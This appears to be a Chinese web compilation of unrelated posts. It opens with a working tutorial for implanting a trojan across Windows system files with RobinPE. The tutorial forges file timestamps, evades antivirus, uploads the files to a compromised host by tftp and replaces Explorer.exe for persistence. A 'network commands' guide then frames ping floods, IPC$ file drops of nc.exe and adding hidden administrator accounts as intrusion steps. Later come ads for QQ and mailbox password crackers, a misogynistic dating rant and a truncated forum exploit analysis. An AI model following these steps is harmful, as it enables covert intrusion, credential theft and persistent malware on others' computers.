打开RobinPE后,点击界面右下角处的“整体植入”按钮,在“后门文件”项中点击浏览选择刚才的木马服务端文件“Server.exe”;然后在“整体植入”中浏览选择备份的“Explorer.exe”文件(如图1)。点击“计算空间”按钮,即可开始计算宿主文件“Explorer.exe”中剩余的空间,对比木马文件“Server.exe”的大小,判断是否可以将文件植入宿主文件中。从最后的计算结果中我们可以看到,木马文件共有“177664”字节,而宿主文件中仅剩下了26531个字节空间,因此该木马显得太大,不能植入Explorer.exe文件中(如图2)。
图1
图2
三、化整为零,分体植入法
怎么办呢?可以换一个体积较小的木马服务端文件,或者更换宿主文件。不过我选的这个木马感觉比较好用,而且不易被查杀,同时Explorer.exe又是一个最佳的木马后门藏身之所,每次系统启动都必须运行这个进程,从而保障了木马能可靠地被执行,因此我打算使用RobinPE的另一种木马植入方法。
刚才使用的“整体植入”,是将木马文件全部植入一个EXE文件之中;而分体植入则是将一个文件拆解植入到多个文件里,这样就保证了木马文件有足够的存放空间。
1.设置多个宿主文件
点击界面右下角的“分体植入”按钮,切换到分体植入界面中(如图3)。在“分解植入”项中点击“添加”按钮,添加多个宿主文件到中间的列表框中。添加完毕后,点击“计算空间”即可计算所有宿主文件总的剩余空间,对比木马文件大小以判断是否能够植入。可以选择添加8个宿主文件,要求所有宿主文件都位于同一目录中,并且在植入后不能将宿主文件随意改名。在这里选择了与Explorer.EXE位于同一目录下的“hh.exe”、“winhelp.exe”等几个文件。
图3
小提示:为了不破坏本地的程序文件,可将这几个宿主文件复制备份到另一文件夹下进行。
2.设置启动文件
在宿主文件列表框中,选择其中一个宿主文件“Explorer.exe”,然后点击右边的“设为启动”,此宿主文件将被作为主启动文件。木马文件还原代码和数据表都将植入到这个文件中,以后只要运行宿主文件,该文件就会自动将分解在各宿主文件中的木马组合还原成完整的程序,并自动执行。
设置完毕后,点击“开始植入”按钮,即可开始将木马服务端程序“Server.exe”文件分解植入到“Explorer.exe”等几个文件中了。
3.修改文件时间
由于植入木马后,启动文件和宿主文件的文件创建和修改日期会发生变化,因此我们需要将文件时间修改恢复原样。在RobinPE中自带了一个叫作“时空机器”的工具,可以修改文件的时间和日期。在文件框中浏览输入文件路径和文件名,然后在界面下方设置程序文件的创建时间和修改时间,最后点击“确认修改”即可(如图4)。
图4
四、上传木马文件
先在本地用金山和瑞星杀毒软件扫描一下被植入木马的启动文件和几个宿主文件,扫描结果未提示有病毒。本来嘛,病毒已经加过壳而且现在被分解了,怎么可能查得出来呢?
现在用TFTPD32.exe在本地建立了一个TFTP服务器(如图5),在远程目标主机的Shell中输入如下命令:“tftp -i 本机IP get 上传文件”,将所有植入木马的文件上传到目标主机的任意目录下。
图5
五、运行木马
现在需要将上传的文件全部复制到对方的“System”目录下,其中除了宿主文件“Explorer.exe”文件外,其它文件都可以直接复制过去。而“Explorer.exe”文件由于正在运行中,因此无法通过复制替换掉。可以采用两种方法:
1.使用“taskkill”命令杀掉“Explorer.exe”进程,输入命令格式如下:“taskkill /F /IM Explorer.exe”。然后再将上传的Explorer.exe文件复制到“System”目录下,运行“explorer”重新运行此命令,木马就在后台悄悄运行了。
2.使用Windows中的“Replace”命令,此命令可以替换掉正在运行中的程序和文件。如图6所示在目标主机Shell中输入命令“Replace c:\windows\system\Explorer.exe c:\temp\”(这里假设“Explorer.exe”上传在c:\temp文件夹下。),就可以用上传的“Explorer.exe”文件替换掉正在运行的程序文件了。重启系统以后,木马就会随“Explorer.exe”自动运行了。
图6
看了上面的方法,大家是不是感觉到又有了一种新思路?将木马分体植入几个文件中,不改变文件的大小,可以有效的躲过查杀;而替换掉系统必调用的程序,使得每次系统启动都会自动运行我们的木马,比将木马添加到注册表启动键值中或放入系统启动程序组中要隐蔽得多了。为植入木马犯愁的朋友不妨可以试一试这个方法。
详细解说iexplore.exe是进程还是病毒
这个东西可以说是病毒,也可以说不是病毒。
因为微软的浏览器就是IEXPLORE.EXE,但是它一般情况随系统被安装在C:\Program Files\Internet Explorer下面。那么,如果发现这个文件是在这个目录下面的,一般情况不是病毒,当然,不包括已经被感染了的情况;还有一种情况,就是IEXPLORE.EXE在C:\WINDOWS\system32\下面,那么这个十有八九都是病毒。
系统进程--伪装的病毒 iexplore.exe
Trojan.PowerSpider.ac 破坏方法:密码解霸V8.10。又称“密码结巴”。偷用户各种密码,包含:游戏密码、局域网密码、腾讯QQ账号和密码、POP3 密码、Win9x缓存密码及拨号账号等等。这个木马所偷密码的范围很广,对广大互联网用户的潜在威胁也巨大。
现象:
1、系统进程中有iexplore.exe运行,注意,是小写字母;
2、搜索该程序iexplore.exe,不是位于C盘下的PROGRAMME文件夹,而是WINDOWS32文件夹。
解决办法:
1、到C:\\WINDOWS\\system32下找到ixplore.exe 和 psinthk.dll 完全删除之。
2、到注册表中,找到HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion \\Run “mssysint”= iexplore.exe,删除其键值。
系统安全技巧之如何对MSN密码进行修改
原来MSN的密码可以通过其主站直接修改,但由于某些合并的问题,所以他(MSN,LIVE)修改密码就更困难了。
下面提供了两种方法:
1.给你一个网站直接登录后,输入你的msn用户名和密码就可以修改了。
2.教你如何一步一步的进入MSN修改密码的提示框。
希望对大家有帮助。
1.直接登录:https://account.live.com/ (推荐)
2.通过MSN进入的详细办法:
登录http://www.msn.com/
在的图标下面是频道列表,再下面是MSN 服务里面有一项叫MSN 客户服务。点击后会弹出一个页面,在这个图标下面你会找到“重新设置密码”,页面会变成一个白色的问题和回答。这是一个MS解答用户的页面,在这个页面下边更改密码才是我们的需要的。
单击后会进入另一个问题就是更改密码。这样我们可以通过点击“1.登录帐户服务。”等待一会,输入你的用户名(Email)和密码就可以进入了。登录成功后点击更改密码就可以修改密码。
另类破解 用超级解霸解决加了密的VCD
这种VCD光盘都不能在电脑CD光驱上看,通过设备管理器进入也不能显示任何文件。就算能看也只有一面可以。下面我就介绍一种VCD加密技术和破解方法。
人工光盘坏道是目前最新最常用的加密方法,原理是该VCD带防盗圈,这个圈的作用是在光头读盘到防盗圈处时是个坏道,从物理上让光驱读不过去,你会发现光盘可以显示容量,但打开目录却没有任何文件,市面上的最新VCD都是采用这种加密方法。象我想拷的正版神勇铁金刚,无间道3就是这种方法。
安装豪杰解霸3000零售版或者豪杰超级解霸8.0完全安装。其实任何版本的豪杰解霸可以,其实只要其中的一个工具“MP3数字CD抓轨”,打开之,放入加密光盘。打开软件,找到VCD所在的光驱,选择轨道中最大的那个文件,在确定你要保存文件的路径。其他的选择就自己看着办吧。点击“开始读取”,稍等几分钟。
完毕,打开你保存的文件目录,会发现有个后缀名为.RAW的文件,那就是你要看的有图像、有声音的VCD了,用Windows Media Player看吧!
教你简单方法轻松破解超级保镖的密码
超级保镖从面市以来就受到了广大电脑爱好者的欢迎,它的磁盘保护功能是让人惊叹的,有一句话说的是“有利就有弊”,这么强大的功能一定也有弊的一面。
如果您忘记了超级保镖的系统管理员密码,那您就不能进入超级保镖的高级用户设置,更改超级保镖的系统设置了,后果就不用我多说了吧,您一定知道的!
我觉得超级保镖的密码是它最脆弱的一面,超级保镖的密码是保存在超级保镖所在的文件夹中的sysmode.ini文件。如果您是用记事本查看该文件内容,密码是被隐藏了的,能不能把密码读出来呢?小生才疏学浅没办法做到,但可以把它破解。其实,破解超级保镖的密码一点也不难,只要会操作电脑的人士都能做到。
密码破解方法如下:
首先,找到超级保镖所在的文件夹(超级保镖默认的文件夹名称为:SafeDisk);
其次,找到超级保镖文件夹中的 sysmode.ini文件;
再次,将sysmode.ini删除,并重新启动计算机;
最后,进入Windows后,在Windows的系统栏点击"超级保镖"图标,进入高级用户设置,重新设定密码并保存就行了。
是不是很简单,希望我的这一招能对您有所帮助。
预防第一!熊猫烧香病毒的预防方法
这几天“熊猫烧香”的变种更是表象异常活跃,近半数的网民深受其害。对于已经感染“熊猫烧香”病毒的用户,建议参考《熊猫烧香病毒专杀及手动修复方案》,下载其中的专钉工具进行查杀,也可手动查杀。技术专家还总结了以下预防措施,帮你远离“熊猫烧香”病毒的骚扰。
1、立即检查本机administrator组成员口令,一定放弃简单口令甚至空口令,安全的口令是字母数字特殊字符的组合,自己记得住,别让病毒猜到就行。
修改方法:右键单击“我的电脑”,选择管理,浏览到本地用户和组,在右边的窗中,选择具备管理员权限的用户名,单击右键,选择设置密码,输入新密码就行。
图1 修改Administrator密码
2.、利用组策略,关闭所有驱动器的自动播放功能。
步骤:单击开始,运行,输入gpedit.msc,打开组策略编辑器,浏览到计算机配置,管理模板,系统,在右边的窗格中选择关闭自动播放,该配置缺省是未配置,在下拉框中选择所有驱动器,再选取已启用,确定后关闭。最后,在开始,运行中输入gpupdate,确定后,该策略就生效了。
图2 关闭所有驱动器的自动播放功能
图3 关闭所有驱动器的自动播放功能
3、修改文件夹选项,以查看不明文件的真实属性,避免无意双击骗子程序中毒。
步骤:打开资源管理器(按windows徽标键+E),点工具菜单下文件夹选项,再点查看,在高级设置中,选择查看所有文件,取消隐藏受保护的操作系统文件,取消隐藏文件扩展名。
图4 修改文件夹属性
4、时刻保持操作系统获得最新的安全更新,建议用毒霸的漏洞扫描功能。
5、启用windows防火墙保护本地计算机。
对于已经感染“熊猫烧香”病毒的用户,建议参考《熊猫烧香病毒专杀及手动修复方案》,下载其中的专钉工具进行查杀,也可手动查杀。
对于未感染的用户,专家建议,不要登陆不良网站,及时下载微软公布的最新补丁,来避免病毒利用漏洞袭击用户的电脑,同时上网时应采用“杀毒软件+防火墙”的立体防御体系。
最常用的网络命令精萃
一,ping
它是用来检查网络是否通畅或者网络连接速度的命令。
作为一个生活在网络上的管理员或者黑客来说,ping命令是第一个必须掌握的DOS命令,它所利用的原理是这样的:网络上的机器都有唯一确定的IP地址,我们给目标IP地址发送一个数据包,对方就要返回一个同样大小的数据包,根据返回的数据包我们可以确定目标主机的存在,可以初步判断目标主机的操作系统等。下面就来看看它的一些常用的操作。先看看帮助吧,在DOS窗口中键入:ping /? 回车,出现如图1。所示的帮助画面。在此,我们只掌握一些基本的很有用的参数就可以了(下同)。
-t 表示将不间断向目标IP发送数据包,直到我们强迫其停止。试想,如果你使用100M的宽带接入,而目标IP是56K的小猫,那么要不了多久,目标IP就因为承受不了这么多的数据而掉线,呵呵,一次攻击就这么简单的实现了。
-l 定义发送数据包的大小,默认为32字节,我们利用它可以最大定义到65500字节。结合上面介绍的-t参数一起使用,会有更好的效果哦。
-n 定义向目标IP发送数据包的次数,默认为3次。如果网络速度比较慢,3次对我们来说也浪费了不少时间,因为现在我们的目的仅仅是判断目标IP是否存在,那么就定义为一次吧。
说明一下,如果-t 参数和 -n参数一起使用,ping命令就以放在后面的参数为标准,比如“ping IP -t -n 3”,虽然使用了-t参数,但并不是一直ping下去,而是只ping 3次。另外,ping命令不一定非得ping IP,也可以直接ping主机域名,这样就可以得到主机的IP。
下面我们举个例子来说明一下具体用法。
这里time=2表示从发出数据包到接受到返回数据包所用的时间是2秒,从这里可以判断网络连接速度的大小 。从TTL的返回值可以初步判断被ping主机的操作系统,之所以说“初步判断”是因为这个值是可以修改的。这里TTL=32表示操作系统可能是win98。
(小知识:如果TTL=128,则表示目标主机可能是Win2000;如果TTL=250,则目标主机可能是Unix)
至于利用ping命令可以快速查找局域网故障,可以快速搜索最快的QQ服务器,可以对别人进行ping攻击……这些就靠大家自己发挥了。
二,nbtstat
该命令使用TCP/IP上的NetBIOS显示协议统计和当前TCP/IP连接,使用这个命令你可以得到远程主机的NETBIOS信息,比如用户名、所属的工作组、网卡的MAC地址等。在此我们就有必要了解几个基本的参数。
-a 使用这个参数,只要你知道了远程主机的机器名称,就可以得到它的NETBIOS信息如图3(下同)。
-A 这个参数也可以得到远程主机的NETBIOS信息,但需要你知道它的IP。
-n 列出本地机器的NETBIOS信息。
当得到了对方的IP或者机器名的时候,就可以使用nbtstat命令来进一步得到对方的信息了,这又增加了我们入侵的保险系数。
三,netstat
这是一个用来查看网络状态的命令,操作简便功能强大。
-a 查看本地机器的所有开放端口,可以有效发现和预防木马,可以知道机器所开的服务等信息,如图4。
这里可以看出本地机器开放有FTP服务、Telnet服务、邮件服务、WEB服务等。用法:netstat -a IP。
-r 列出当前的路由信息,告诉我们本地机器的网关、子网掩码等信息。用法:netstat -r IP。
四,tracert
跟踪路由信息,使用此命令可以查出数据从本地机器传输到目标主机所经过的所有途径,这对我们了解网络布局和结构很有帮助。
这里说明数据从本地机器传输到192.168.0.1的机器上,中间没有经过任何中转,说明这两台机器是在同一段局域网内。用法:tracert IP。
--------------------------------------------------------------------------------
五,net
这个命令是网络命令中最重要的一个,必须透彻掌握它的每一个子命令的用法,因为它的功能实在是太强大了,这简直就是微软为我们提供的最好的入侵工具。首先让我们来看一看它都有那些子命令,键入net /?回车。
在这里,我们重点掌握几个入侵常用的子命令。
net view
使用此命令查看远程主机的所以共享资源。命令格式为net view \IP。
net use
把远程主机的某个共享资源影射为本地盘符,图形界面方便使用,呵呵。命令格式为net use x: \IPsharename。上面一个表示把192.168.0.5IP的共享名为magic的目录影射为本地的Z盘。下面表示和192.168.0.7建立IPC$连接(net use \IPIPC$ "password" /user:"name")。
建立了IPC$连接后,呵呵,就可以上传文件了:copy nc.exe \192.168.0.7admin$,表示把本地目录下的nc.exe传到远程主机,结合后面要介绍到的其他DOS命令就可以实现入侵了。
net start
使用它来启动远程主机上的服务。当你和远程主机建立连接后,如果发现它的什么服务没有启动,而你又想利用此服务怎么办?就使用这个命令来启动吧。用法:net start servername,如图9,成功启动了telnet服务。
net stop
入侵后发现远程主机的某个服务碍手碍脚,怎么办?利用这个命令停掉就ok了,用法和net start同。
net user
查看和帐户有关的情况,包括新建帐户、删除帐户、查看特定帐户、激活帐户、帐户禁用等。这对我们入侵是很有利的,最重要的,它为我们克隆帐户提供了前提。键入不带参数的net user,可以查看所有用户,包括已经禁用的。下面分别讲解。
1,net user abcd 1234 /add,新建一个用户名为abcd,密码为1234的帐户,默认为user组成员。
2,net user abcd /del,将用户名为abcd的用户删除。
3,net user abcd /active:no,将用户名为abcd的用户禁用。
4,net user abcd /active:yes,激活用户名为abcd的用户。
5,net user abcd,查看用户名为abcd的用户的情况。
net localgroup
查看所有和用户组有关的信息和进行相关操作。键入不带参数的net localgroup即列出当前所有的用户组。在入侵过程中,我们一般利用它来把某个帐户提升为administrator组帐户,这样我们利用这个帐户就可以控制整个远程主机了。用法:net localgroup groupname username /add。
现在我们把刚才新建的用户abcd加到administrator组里去了,这时候abcd用户已经是超级管理员了,呵呵,你可以再使用net user abcd来查看他的状态,和图10进行比较就可以看出来。但这样太明显了,网管一看用户情况就能漏出破绽,所以这种方法只能对付菜鸟网管,但我们还得知道。现在的手段都是利用其他工具和手段克隆一个让网管看不出来的超级管理员,这是后话。有兴趣的朋友可以参照《黑客防线》第30期上的《由浅入深解析隆帐户》一文。
net time
这个命令可以查看远程主机当前的时间。如果你的目标只是进入到远程主机里面,那么也许就用不到这个命令了。但简单的入侵成功了,难道只是看看吗?我们需要进一步渗透。这就连远程主机当前的时间都需要知道,因为利用时间和其他手段(后面会讲到)可以实现某个命令和程序的定时启动,为我们进一步入侵打好基础。用法:net time \IP。
六,at
这个命令的作用是安排在特定日期或时间执行某个特定的命令和程序(知道net time的重要了吧?)。当我们知道了远程主机的当前时间,就可以利用此命令让其在以后的某个时间(比如2分钟后)执行某个程序和命令。用法:at time command \computer。
表示在6点55分时,让名称为a-01的计算机开启telnet服务(这里net start telnet即为开启telnet服务的命令)。
七,ftp
大家对这个命令应该比较熟悉了吧?网络上开放的ftp的主机很多,其中很大一部分是匿名的,也就是说任何人都可以登陆上去。现在如果你扫到了一台开放ftp服务的主机(一般都是开了21端口的机器),如果你还不会使用ftp的命令怎么办?下面就给出基本的ftp命令使用方法。
首先在命令行键入ftp回车,出现ftp的提示符,这时候可以键入“help”来查看帮助(任何DOS命令都可以使用此方法查看其帮助)。
大家可能看到了,这么多命令该怎么用?其实也用不到那么多,掌握几个基本的就够了。
首先是登陆过程,这就要用到open了,直接在ftp的提示符下输入“open 主机IP ftp端口”回车即可,一般端口默认都是21,可以不写。接着就是输入合法的用户名和密码进行登陆了,这里以匿名ftp为例介绍。
用户名和密码都是ftp,密码是不显示的。当提示**** logged in时,就说明登陆成功。这里因为是匿名登陆,所以用户显示为Anonymous。
接下来就要介绍具体命令的使用方法了。
dir 跟DOS命令一样,用于查看服务器的文件,直接敲上dir回车,就可以看到此ftp服务器上的文件。
cd 进入某个文件夹。
get 下载文件到本地机器。
put 上传文件到远程服务器。这就要看远程ftp服务器是否给了你可写的权限了,如果可以,呵呵,该怎么 利用就不多说了,大家就自由发挥去吧。
delete 删除远程ftp服务器上的文件。这也必须保证你有可写的权限。
bye 退出当前连接。
quit 同上。
八,telnet
功能强大的远程登陆命令,几乎所有的入侵者都喜欢用它,屡试不爽。为什么?它操作简单,如同使用自己的机器一样,只要你熟悉DOS命令,在成功以administrator身份连接了远程机器后,就可以用它来干你想干的一切了。下面介绍一下使用方法,首先键入telnet回车,再键入help查看其帮助信息。
然后在提示符下键入open IP回车,这时就出现了登陆窗口,让你输入合法的用户名和密码,这里输入任何密码都是不显示的。
当输入用户名和密码都正确后就成功建立了telnet连接,这时候你就在远程主机上具有了和此用户一样的权限,利用DOS命令就可以实现你想干的事情了,如图19。这里我使用的超级管理员权限登陆的。
到这里为止,网络DOS命令的介绍就告一段落了,这里介绍的目的只是给菜鸟网管一个印象,让其知道熟悉和掌握网络DOS命令的重要性。其实和网络有关的DOS命令还远不止这些,这里只是抛砖引玉,希望能对广大菜鸟网管有所帮助。学好DOS对当好网管有很大的帮助,特别的熟练掌握了一些网络的DOS命令。
另外大家应该清楚,任何人要想进入系统,必须得有一个合法的用户名和密码(输入法漏洞差不多绝迹了吧),哪怕你拿到帐户的只有一个很小的权限,你也可以利用它来达到最后的目的。所以坚决消灭空口令,给自己的帐户加上一个强壮的密码,是最好的防御弱口令入侵的方法。
最后,由衷的说一句,培养良好的安全意识才是最重要的。
很好!我又混完了一年,我的生命又再次减少了一年,也许我的悲哀也随着这一年的结束而减少.
关于学业,生活:
我趴在电脑前,不自觉的又点燃一根烟,努力回想着上一年里我都干了些什么事情,可却没一件让我记忆尤新的. 唯一在我脑子会常常闪现的事情,竟是上一年里,我挂了好多科,补考了好多次,还有一次重修,和一次正在计划中的重修. 会造成这样子的原因似乎应该是有很多,但如果仔细分析,就只有怪自己没认真学了. 3月份开学不久,我在一种极度没有信心的心情下查询了自己的四级考试成绩,很幸运,我过了. 于是,我很高兴,也因为这个,我一时间还给自己拟订了好多学习计划,因为我好久没有因为考试而开心过了.可是,接下来9个月里,我真的是一无是处......连续几个月不去上课,甚至连考试都会因为睡觉而耽误. 两次6级考试都在完全没有准备的情况下了事,网络工程师的考试更是可笑,6-7百页的书,我用了2分多中,看了不到5页变去考试,要是被别人知道了,真不知道会不会被鄙视呢.可是无奈,我还要安慰自己,考的值,你还没有死呢,还要继续考,明年,后年.
一段时间里,连我自己也讨厌透了自己,但是,却不知道为什么总是从那个'我'的影子里走不出来. 可 转眼大三,周围以近弥漫着一种奇怪的气息,所有人似乎都在为自己不久的将来偷偷做着什么准备,我还是那样,没招没落,失魂落魄,也不知道为什么......其实我也真的很担心自己能否顺利毕业并找到一份工作,但这份担心也只是被禁锢在内心的一快废墟里,不着边际. 说起来,应该算是我对自己不负责的表现吧, 一个对自己都不负责的人,不知道能不能对别的事物付的起责呢?所以,一时间,我便会特别害怕未来,我的未来到底是怎么样子的,是整日为了生活而忙碌不堪,或是沉溺于某个事物而失去自我不可自拔,也许会是对所有事情都莫不关心,根本就不在乎明天? 难说着呢. 尽管担心,可又能怎么样呢? 晚上还是整晚整晚睡不着,做在电脑钱发愣; 白天还是永远都醒不来, 永远 都做着没有逻辑的白日梦...... 啊,不要悲伤啊,life goes on..
关于情感?
很奇怪?我是不是就适合一个人过? 一个人的时候,真的很自在.不管你干什么事都没有人会理你.我可以一两天不去吃饭,呆在宿舍里面对着电脑,直到饿的实在是不行了; 我可以一天吃个十几顿饭, 想起什么就跑去吃什么,不用担心,都是自己吃了,没有什么不舍得; 我可以在很冷的时候,穿的很少很少,然后跑出去逛,让所有看到我的人都想过来抽我; 我可以把所有能穿的衣服全裹在身上,在盖上被子,假装自己已经死了; 我可以一学期不洗衣服,一套衣服穿一两个月不换,那又有什么. 我可以没事就去洗衣服,夏天洗,冬天也洗,白天洗,晚上也洗,因为一边洗一边可以玩水,这是最好的解闷的方法,反正水钱是免费的; 有的时候,好久好久不洗澡,也不洗头,有时候天天都想去冲个凉, 有时候半夜三点还要起来去水房拿凉水洗个头. 有的时候,我会一两个月不和任何人说任何话.除了跟食堂的师傅说声 我要这个菜啊; 有的时候我又逮住谁都要招呼一声,在买点吃的啊,喝的,一起谈谈天下. 啊,真的是自由自在.你看看那,我的头发都长的多长了哦. 脑子里面可以什么都没有, 没有自己,更没有别人,连今天没吃饭也可以没有呢... 可无论怎样放纵自己都没有关系. 因为没有人会去怪你.大不了会有人说,这人是不是神经有问题啊.
可是,也会突然见觉得,在食堂里,那一对对情侣,面面而对,分食几碟小菜,两人有时候抢的吃一块东西,有时候又互相夹送到对放嘴里. 看起来吃的好开心呢. 要是我也有个爱人在一起,我们也能那样,无聊,难过的时候也不用去洗衣服玩,可以叫上她找个找个更好玩的玩. 两个人一起分享两个人的快乐, 是比一个人独自享受自己的快乐要更快乐的.
但,这时候,我又会特别害怕,跑回宿舍. 要是当我要又习惯了两个人一起吃饭,习惯了无聊,难过的时候和她玩,习惯了和她分享自己的快乐时, 她走了,我一定会吃不下饭,无聊时更无聊,难过时更难过,哪里还会有快乐的时候了.
突然间,我才明白,这世界上最爱你,永远不会抛弃我的是妈妈,她总是做给我想吃的东西吃. 当我肚子疼的时候,会急个半死,给我喂了药,还要一直首在我的身边.我不开心的时候,总是她第一个看出来. 我知道我不算是个好孩子,从来没有为妈妈做过一个儿子该做的事,可是,不论我做错什么,都能得到妈妈的原谅.所以,我真的好害怕,好害怕妈妈象爷爷奶奶一样.所以,我也会偷偷的企求上天,可怜可怜我,保护好我的妈妈,真的希望妈妈永远能守护我.
还有我的朋友们哪,我是真的把你们当作自己的朋友,生命的一部分.虽然我不会经常打电话联系你们,可你门确实我最期望见到的人,最想祝福的人. 其实,每次出去总要你们来买单,我很过意不去,但我也没有办法.所以,我也只能帮大家提提最重的东西,赞成你们提出的所有意见,不会跟你们任何人争吵,愿意帮你们做任何事.然后还会发誓,等我有钱了,一定送大家最好的礼物,买所有的单.
关于未来
以前,觉得未来很远,现在,似乎忽然变的很近很近了.我对未来想的不多,只是告诉自己一定要比现在幸福啊.我已经荒废这么久的时间来弄懂人生了,现在才觉得,人生很多事弄不懂的. 想想,天这么大,总该分一小块来由我支撑.
别怕啊,属于你的东西,别人拿不走,但至少你得准备好了才能接受啊.既然未来都这么近了,就赶快做好准备,好迎接属于我自己的幸福吧.
啊,写的好乱,这是给自己的新年礼物.生活再继续,祝福大家能得到快乐,也祝福自己快乐,有个新的开始
我想这已经是共识,没钱?那就别想谈女朋友了,别再幻想着什么纯洁无暇爱情了,都是扯淡。当你憋着小嘴愤愤不平的拿这个诅咒分手女友的无情的时候,那只能说明你无能懦夫懒惰加上小人,离开你是明智选择。给你个富婆说不定你绝情的嘴脸比谁都更丑陋。所以,男人,想讨老婆就赚钱吧,不管你混黑社会杀人放火贩毒走私只要你能弄到票子女人就多得让你眼花了
2.丑
经典语句,长得丑不是你的错,出来吓人就是你不对了,如果你敢说一句外表不是主要 的,心灵美才是重要的,打住,那我就给你一头猪一样的恐龙做老婆我看你什么反映,己所不欲勿施与人,当你做着想癞hama吃天鹅肉的美梦时,女孩还在走着灰姑娘的神 呢。
3.薄
这个薄是脸皮薄的意思,如果你文质彬彬,甚至会害羞,傻傻的,你如果不是内心真有点城府的话,那看来你跟异性也是绝缘了,别想着八十年代电影里女孩说傻的可爱了,时代不同了,并且进步太快了。如果你能达到不要脸的流氓地步,也是泡妞的最高境界了。
4.专
这里指的是在一棵树上吊死,如果你是个痴情专一的汉字,对一个MM渴望用坚持和痴情来感动,我想你离沉重打击不远了,现在的MM才不喜欢你用情专一呢,如果你能到处沾花惹草正说明你的本事,MM虽然会幽怨,其实底子里才更看得起你呢。保证你召之即来,挥之即去。
5.笨
这里的笨是指嘴笨,不需要你多厉害的口才,但是甜言蜜语是要会说的,哪怕你心里想着另一个MM,口里把对这个MM的感情换个名字说给那个听也行,爱的肉麻。
6.真
其实和五差不多,就是太真诚了,MM是要来骗和哄的,你傻傻的都说实话掏老底,嘿嘿,那你也等着MM和你拜拜吧。
7.小
此小非那个。。。小,嘿嘿,是胆小,好像和三类似,但也不是,只要有机会,能拉手早拉手,拉了手了要赶快亲,不要觉得太快了,现在是个效率的社会,你不快有人比你快,也别担心MM会觉得你轻浮,她比你还急呢。
8.
专指看贴不回贴就跑了的人
专指看贴不回贴就跑了的人,这类也是找不到女朋友的,自己掂量吧。。
2.看《Thinking In C++》,不要看《C++变成死相》;
3.看《The C++ Programming Language》和《Inside The C++ Object Model》,不要因为他们很难而我们自己是初学者所以就不看;
4.不要被VC、BCB、BC、MC、TC等词汇所迷惑——他们都是集成开发环境,而我们要学的是一门语言;
5.不要放过任何一个看上去很简单的小编程问题——他们往往并不那么简单,或者可以引伸出很多知识点;
6.会用Visual C++,并不说明你会C++;
7.学class并不难,template、STL、generic programming也不过如此——难的是长期坚持实践和不遗余力的博览群书;
8.如果不是天才的话,想学编程就不要想玩游戏——你以为你做到了,其实你的C++水平并没有和你通关的能力一起变高——其实可以时刻记住:学C++是为了编游戏的;
9.看Visual C++的书,是学不了C++语言的;
10.浮躁的人容易说:XX语言不行了,应该学YY;——是你自己不行了吧!?
11.浮躁的人容易问:我到底该学什么;——别问,学就对了;
12.浮躁的人容易问:XX有钱途吗;——建议你去抢银行;
13.浮躁的人容易说:我要中文版!我英文不行!——不行?学呀!
14.浮躁的人容易问:XX和YY哪个好;——告诉你吧,都好——只要你学就行;
15.浮躁的人分两种:a)只观望而不学的人;b)只学而不坚持的人;
16.把时髦的技术挂在嘴边,还不如把过时的技术记在心里;
17.C++不仅仅是支持面向对象的程序设计语言;
18.学习编程最好的方法之一就是阅读源代码;
19.在任何时刻都不要认为自己手中的书已经足够了;
20.请阅读《The Standard C++ Bible》(中文版:标准C++宝典),掌握C++标准;
21.看得懂的书,请仔细看;看不懂的书,请硬着头皮看;
22.别指望看第一遍书就能记住和掌握什么——请看第二遍、第三遍;
23.请看《Effective C++》和《More Effective C++》以及《Exceptional C++》;
24.不要停留在集成开发环境的摇篮上,要学会控制集成开发环境,还要学会用命令行方式处理程序;
25.和别人一起讨论有意义的C++知识点,而不是争吵XX行不行或者YY与ZZ哪个好;
26.请看《程序设计实践》,并严格的按照其要求去做;
27.不要因为C和C++中有一些语法和关键字看上去相同,就认为它们的意义和作用完全一样;
28.C++绝不是所谓的C的“扩充”——如果C++一开始就起名叫Z语言,你一定不会把C和Z语言联系得那么紧密;
29.请不要认为学过XX语言再改学C++会有什么问题——你只不过又在学一门全新的语言而已;
30.读完了《Inside The C++ Object Model》以后再来认定自己是不是已经学会了C++;
31.学习编程的秘诀是:编程,编程,再编程;
32.请留意下列书籍:《C++面向对象高效编程(C++ Effective Object-Oriented Software Construction)》《面向对象软件构造(Object-Oriented Software Construction)》《设计模式(Design Patterns)》《The Art of Computer Programming》;
33.记住:面向对象技术不只是C++专有的;
34.请把书上的程序例子亲手输入到电脑上实践,即使配套光盘中有源代码;
35.把在书中看到的有意义的例子扩充;
36.请重视C++中的异常处理技术,并将其切实的运用到自己的程序中;
37.经常回顾自己以前写过的程序,并尝试重写,把自己学到的新知识运用进去;
38.不要漏掉书中任何一个练习题——请全部做完并记录下解题思路;
39.C++语言和C++的集成开发环境要同时学习和掌握;
40.既然决定了学C++,就请坚持学下去,因为学习程序设计语言的目的是掌握程序设计技术,而程序设计技术是跨语言的;
41.就让C++语言的各种平台和开发环境去激烈的竞争吧,我们要以学习C++语言本身为主;
42.当你写C++程序写到一半却发现自己用的方法很拙劣时,请不要马上停手;请尽快将余下的部分粗略的完成以保证这个设计的完整性,然后分析自己的错误并重新设计和编写(参见43);
43.别心急,设计C++的class确实不容易;自己程序中的class和自己的class设计水平是在不断的编程实践中完善和发展的;
44.决不要因为程序“很小”就不遵循某些你不熟练的规则——好习惯是培养出来的,而不是一次记住的;
45.每学到一个C++难点的时候,尝试着对别人讲解这个知识点并让他理解——你能讲清楚才说明你真的理解了;
46.记录下在和别人交流时发现的自己忽视或不理解的知识点;
47.请不断的对自己写的程序提出更高的要求,哪怕你的程序版本号会变成Version 100.XX;
48.保存好你写过的所有的程序——那是你最好的积累之一;
49.请不要做浮躁的人;
50.请热爱C++!
画蝶QQ密码暴力探测
下载地址联接=>>
[今日推荐]局域网嗅探器LAN Explorer1.50
软件语言: 英文
软件类型: 国产软件
运行环境: Win9x/NT/2000/XP/2003
授权方式: 免费版
软件大小: 378 K
软件等级:
整理时间: 2005-9-16 2:45:29
下载连接==》》
[每日推荐]163邮箱破解器
软件类型: 国产软件
运行环境: Win9x/NT/2000/XP/2003
授权方式: 免费版
软件大小: 276 K
软件等级: ★★★
整理时间: 2006-6-13 11:38:33
下载连接==》》
推荐:动网7.x权限提升漏洞原理
漏洞分析:
我们知道动网是通过GroupID来判断当前用户所在的组的,然后再通过组的信息判断用户的权限。它是如何取得这个GroupID的呢?让我们看看登录验证的那一段:login.asp的525行左右:
Rem ==========论坛登录函数=========
Rem 判断用户登录
Function ChkUserLogin(username,password,mobile,userCookies,ctype)
…………前面的代码省略
SQL="Select UserID,UserName,UserPassword,UserEmail,UserPost,UserTopic,UserSex,UserFace
